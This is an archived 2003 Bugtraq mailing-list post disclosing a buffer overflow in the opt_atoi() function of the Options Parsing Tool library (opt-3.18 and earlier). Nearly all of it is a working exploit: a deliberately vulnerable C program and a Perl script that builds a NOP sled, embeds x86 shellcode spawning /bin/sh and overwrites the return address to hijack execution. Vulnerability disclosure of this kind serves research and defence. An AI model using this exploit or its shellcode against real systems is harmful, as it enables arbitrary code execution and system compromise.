lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030523144139.22054.qmail@www.securityfocus.com>
Date: 23 May 2003 14:41:39 -0000
From: Julien Lanthea <contact@...nthea.net>
To: bugtraq@...urityfocus.com
Subject: Re: Options Parsing Tool library buffer overflows.


In-Reply-To: <3EA85B02.7080000@...soft.com>

As the Secure Network Operations, Inc. (http://www.secnetops.com) told on 
Bugtraq (Apr 24 2003), the function opt_atoi() from the subroutine library
opt-3.18 and prior is vulnerable to buffer overflow attacks.

Here is a sample showing how to exploit the following vulnerable program 
vuln.c using opt_atoi().

vuln.c :
--------

/* To compile vuln.c :                              */
/* cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a */

main(int *argc, char **argv)
{
  /* use OPT opt_atoi() */
        int y = opt_atoi(argv[1]);        printf("opt_atoi(): %i\n", y);
}




expl-optatoi.pl :
-----------------

#!/usr/bin/perl
#
# expl-optatoi.pl : opt_atoi() function exploit (from Options Parsing 
# Tool shared library opt-3.18 and prior) for this vulnerable code.
#
# vuln.c : 
#    main(int *argc, char **argv)
#    {
#        /* use OPT opt_atoi() */
#        int y = opt_atoi(argv[1]);        
#        printf("opt_atoi(): %i\n", y);
#     }
#
# cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a
#
# Author : 
#    jlanthea [contact@...nthea.net]
#
# Syntax : 
#    perl expl-optatoi.pl <offset>   # works for me with offset = -1090


$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
             "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
             "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
             "\xff\xff/bin/sh";


$len = 1032;        # The length needed to own EIP.
$ret = 0xbffff6c0;  # The stack pointer at crash time
$nop = "\x90";      # x86 NOP
$offset = 0;    # Default offset to try.


if (@ARGV == 1) {
    $offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");

$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

exec("/path/to/vuln $buffer");


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ